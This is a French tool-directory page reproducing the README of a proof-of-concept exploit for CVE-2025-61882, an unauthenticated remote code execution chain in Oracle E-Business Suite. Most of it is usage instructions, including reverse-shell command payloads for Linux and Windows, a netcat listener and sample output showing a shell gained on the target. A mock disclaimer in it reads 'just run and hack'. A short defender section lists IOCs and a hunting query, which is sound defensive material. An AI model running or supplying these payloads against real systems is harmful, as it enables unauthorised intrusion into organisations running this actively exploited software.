Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-61882-POC — Exploit pour CVE-2025-61882, une RCE critique sans authentification préalable dans Oracle E-Business Suite. Combine SSRF, injection CRLF, HTTP smuggling et injection XSLT pour une exécution de code à distance sans authentification. | Kitploit
Outils/GitHubGitHub/mindflarex/cve-2025-61882-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubmindflarex/cve-2025-61882-poc

CVE-2025-61882-POC

Exploit pour CVE-2025-61882, une RCE critique sans authentification préalable dans Oracle E-Business Suite. Combine SSRF, injection CRLF, HTTP smuggling et injection XSLT pour une exécution de code à distance sans authentification.

Voir le dépôt
2il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Outil de test de sécurité CVE-2025-61882

CVSS Status Platform License

🚨 AVERTISSEMENT LÉGAL CRITIQUE

Voir notre article de blog pour plus de détails techniques

CET OUTIL EST RÉSERVÉ UNIQUEMENT AUX TESTS DE SÉCURITÉ AUTORISÉS

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨   ║
║                                                              ║
║  By using this tool, you acknowledge and agree that:         ║
║                                                              ║
║                                                              ║
║                 FCK THIS JUST RUN AND HACK                   ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝

📋 Aperçu

Outil de test de sécurité pour CVE-2025-61882, une vulnérabilité critique d'exécution de code à distance avant authentification affectant Oracle E-Business Suite.

Créé par : Mindflare

Détails de la vulnérabilité

  • Identifiant CVE : CVE-2025-61882
  • Score CVSS : 9.8 (Critique)
  • Vecteur d'attaque : Réseau (Non authentifié)
  • Complexité de l'attaque : Moyenne
  • Privilèges requis : Aucun
  • Interaction utilisateur : Aucune
  • Versions affectées : Oracle E-Business Suite 12.2.3 - 12.2.14
  • État du correctif : Correctif d'urgence publié le 4 octobre 2025
  • État de l'exploitation : ⚠️ ACTIVEMENT EXPLOITÉE par le ransomware Cl0p depuis août 2025

Résumé technique

CVE-2025-61882 est une chaîne d'exploitation sophistiquée combinant cinq vulnérabilités distinctes :

  1. SSRF - Falsification de requête côté serveur via /OA_HTML/configurator/UiServlet
  2. Injection CRLF - Injection d'en-têtes HTTP dans le paramètre return_url
  3. HTTP Smuggling - Abus des connexions keep-alive pour atteindre les services internes (port 7201)
  4. Contournement d'authentification - Traversée de chemin via le préfixe /OA_HTML/help/../
  5. Injection XSLT - Le traitement d'un modèle XSL malveillant mène à une exécution de code à distance (RCE)

🎯 Cas d'utilisation prévus

✅ Utilisation acceptable

  • Tests d'intrusion autorisés avec autorisation écrite
  • Recherche en sécurité sur des systèmes vous appartenant
  • Validation de vulnérabilités dans des environnements de laboratoire contrôlés
  • Exercices d'équipe rouge (red team) avec documentation appropriée du périmètre
  • Recherche académique avec approbation institutionnelle
  • Réponse à incident et analyse forensique

❌ Utilisation interdite

  • Tout accès non autorisé à des systèmes
  • Tester des systèmes sans autorisation écrite explicite
  • Activités malveillantes ou causant des dommages
  • Attaquer des systèmes de production sans approbation
  • Utilisation à des fins criminelles
  • Toute activité violant les lois applicables

📦 Installation

Prérequis

  • Python 3.7 ou supérieur
  • Gestionnaire de paquets pip
  • Connectivité réseau vers la cible (uniquement autorisée)
  • Netcat ou auditeur (listener) similaire pour recevoir le reverse shell

Configuration

root@kitploit:~
# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC

# Install dependencies
pip3 install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py

🚀 Utilisation

Étape 1 : Mettez en place votre auditeur (listener)

Dans un terminal séparé, démarrez un auditeur netcat :

root@kitploit:~
# Linux/Mac
nc -lvnp 4444

# Windows
nc.exe -lvnp 4444

Étape 2 : Exécutez l'outil

Utilisation de base (cible Linux) :

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
  --platform linux

Cible Windows :

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
  --platform windows

Paramètres

ParamètreDescriptionRequisExemple
--targetURL cible Oracle EBSOuihttp://192.168.1.22:8000
--lhostVotre adresse IP (pour les rappels)Oui192.168.1.10
--lportPort du serveur HTTP (sert la charge utile XSL)Oui80 ou 8080
--commandCommande à exécuter sur la cibleOuiVoir les exemples ci-dessus
--platformSystème d'exploitation cible : linux ou windowsOuilinux

📊 Exemple de sortie

Sortie de l'outil

root@kitploit:~
[*] Target URL:    http://192.168.1.22:8000
[*] Listener IP:   192.168.1.10
[*] Listener Port: 80
[*] Platform:      linux

[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully

[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully

Sortie de l'auditeur Netcat (si vulnérable)

root@kitploit:~
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$

🛡️ Détection et défense

Pour les défenseurs de la sécurité

Actions immédiates

  1. Appliquez le correctif d'urgence Oracle (ID du document : 30061882.1)
  2. Recherchez des signes de compromission :
    root@kitploit:~
    SELECT * FROM XDO_TEMPLATES_B 
    WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
    
  3. Examinez les journaux d'accès depuis août 2025
  4. Bloquez l'accès Internet sortant depuis les serveurs EBS

Indicateurs de détection

IOC réseau (indicateurs de compromission) :

root@kitploit:~
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)

Modèles HTTP :

  • POST /OA_HTML/configurator/UiServlet
  • POST /OA_HTML/SyncServlet
  • GET /OA_HTML/help/../*.jsp
  • Caractères CRLF dans les paramètres

📚 Références

  • Avis d'alerte de sécurité Oracle
  • Catalogue KEV de la CISA
  • Analyse Google/Mandiant
  • Recherche de watchTowr Labs

📜 Licence

Licence MIT avec restrictions d'utilisation éducative - Voir LICENSE

AVERTISSEMENT : Ce logiciel est destiné uniquement aux tests de sécurité autorisés. L'accès non autorisé à des systèmes informatiques est illégal. L'auteur décline toute responsabilité en cas d'utilisation abusive.


root@kitploit:~

**Created by:** Mindflare | **Last Updated:** October 2025
Télécharger l’outil